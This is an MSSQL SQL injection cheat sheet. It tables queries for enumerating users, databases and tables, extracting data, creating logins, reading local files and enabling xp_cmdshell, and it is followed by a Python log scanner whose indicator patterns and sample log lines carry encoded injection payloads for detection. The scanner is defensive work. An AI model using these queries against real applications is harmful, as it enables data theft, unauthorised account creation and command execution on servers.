After finding the injection point and determining the exact number of columns, we can use the following basic queries to show a proof of concept for the vulnerability.
| Function | Query | Remarks |
| --- | --- | --- |
| Database version | SELECT @@version | |
| Host name | SELECT host_name() | |
| Current database | SELECT DB_NAME() | |
| Current user | SELECT system_user; SELECT user; SELECT user_name() | |
| List users | SELECT name FROM master..syslogins | |
| List databases | SELECT name FROM master..sysdatabases; SELECT DB_NAME(n) | n = 1, 2, 3, … |
| Get tables from current database | SELECT table_name FROM information_schema.tables; | |
| Get tables from another database | SELECT name FROM other_database..sysobjects WHERE xtype = 'U'-- | |
| Get columns of a table in the current database | SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name'; | |
| Get columns of a table in another database | SELECT other_database..syscolumns.name, TYPE_NAME(other_database..syscolumns.xtype) FROM other_database..syscolumns, other_database..sysobjects WHERE other_database..syscolumns.id = other_database..sysobjects.id AND other_database..sysobjects.name = 'other_table' | |
| Extract data | SELECT column_name FROM table_name | |
| Extract data from another database | SELECT other_column_name FROM other_database..other_table | |
| Create user | EXEC sp_addlogin 'user', 'pass'; | Requires elevated privileges |
| Location of database files | EXEC sp_helpdb master; EXEC sp_helpdb pubs; | |
| Local file access | BULK INSERT mydata FROM 'c:\boot.ini'; | |
| Command execution | EXEC sp_configure 'xp_cmdshell', 1; | Requires elevated privileges |
If you want to go further, such as extracting data from the database or running an OS shell, you can use the sqlmap tool.
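From the defender's side, the identifiers in the table above (`@@version`, `master..syslogins`, `information_schema.columns`, `sp_addlogin`, `xp_cmdshell`, and so on) are exactly the strings that stand out in web server access logs when someone works through this cheat sheet against an application. The following is an added example, not part of the original page: a small Python log scanner that URL-decodes each request target (including double-encoded payloads) and tags it with the MSSQL enumeration indicators it contains. The log lines, IP addresses and paths are constructed for the example; the indicator names are my own labels.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns taken from the query identifiers in the cheat sheet above.
# The bare "SELECT user" form is deliberately left out: "user" appears in far too
# many legitimate URLs to be a usable signature on its own.
INDICATORS = {
    "version_probe":  r"@@version",
    "hostname_probe": r"\bhost_name\s*\(",
    "dbname_probe":   r"\bdb_name\s*\(",
    "user_probe":     r"\b(system_user|user_name\s*\()",
    "login_enum":     r"master\.\.syslogins",
    "database_enum":  r"master\.\.sysdatabases",
    "schema_enum":    r"information_schema\.(tables|columns)",
    "sysobject_enum": r"\.\.(sysobjects|syscolumns)\b",
    "login_create":   r"\bsp_addlogin\b",
    "file_location":  r"\bsp_helpdb\b",
    "file_read":      r"\bbulk\s+insert\b",
    "cmd_exec":       r"\b(sp_configure|xp_cmdshell)\b",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in INDICATORS.items()}

# Matches the request section of a common/combined-format web server log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_target(target: str, max_rounds: int = 3) -> str:
    """URL-decode the request target, repeating to unwrap double encoding
    (e.g. %2527 -> %27 -> ') so that encoded payloads are still matched."""
    decoded = target
    for _ in range(max_rounds):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def classify_request(target: str) -> list:
    """Return the sorted indicator names found in one request target."""
    decoded = decode_target(target)
    return sorted(name for name, rx in COMPILED.items() if rx.search(decoded))


def scan_log(lines) -> list:
    """Scan log lines and return one finding per line that carries an indicator."""
    findings = []
    for idx, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line in the expected format
        hits = classify_request(m.group("target"))
        if hits:
            findings.append({
                "line": idx,
                "client": line.split(" ", 1)[0],
                "method": m.group("method"),
                "indicators": hits,
            })
    return findings


# Constructed sample log lines (not real traffic); hosts and paths are made up.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /products?id=12 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /products?id=12%27;SELECT%20@@version-- HTTP/1.1" 500 211',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /products?id=12%27;SELECT%20name%20FROM%20master..syslogins-- HTTP/1.1" 500 230',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /products?id=12%27;EXEC%20sp_configure%20%27xp_cmdshell%27,1-- HTTP/1.1" 500 198',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=version+history HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(f"line {finding['line']}: {finding['client']} -> {', '.join(finding['indicators'])}")
```

The sequence of indicators from one client (version probe, then login enumeration, then a `sp_configure`/`xp_cmdshell` attempt) mirrors the order of the cheat sheet itself, so grouping findings by client address and watching for that progression gives a much stronger signal than any single pattern; the 500 responses alongside those requests are the other thing to correlate.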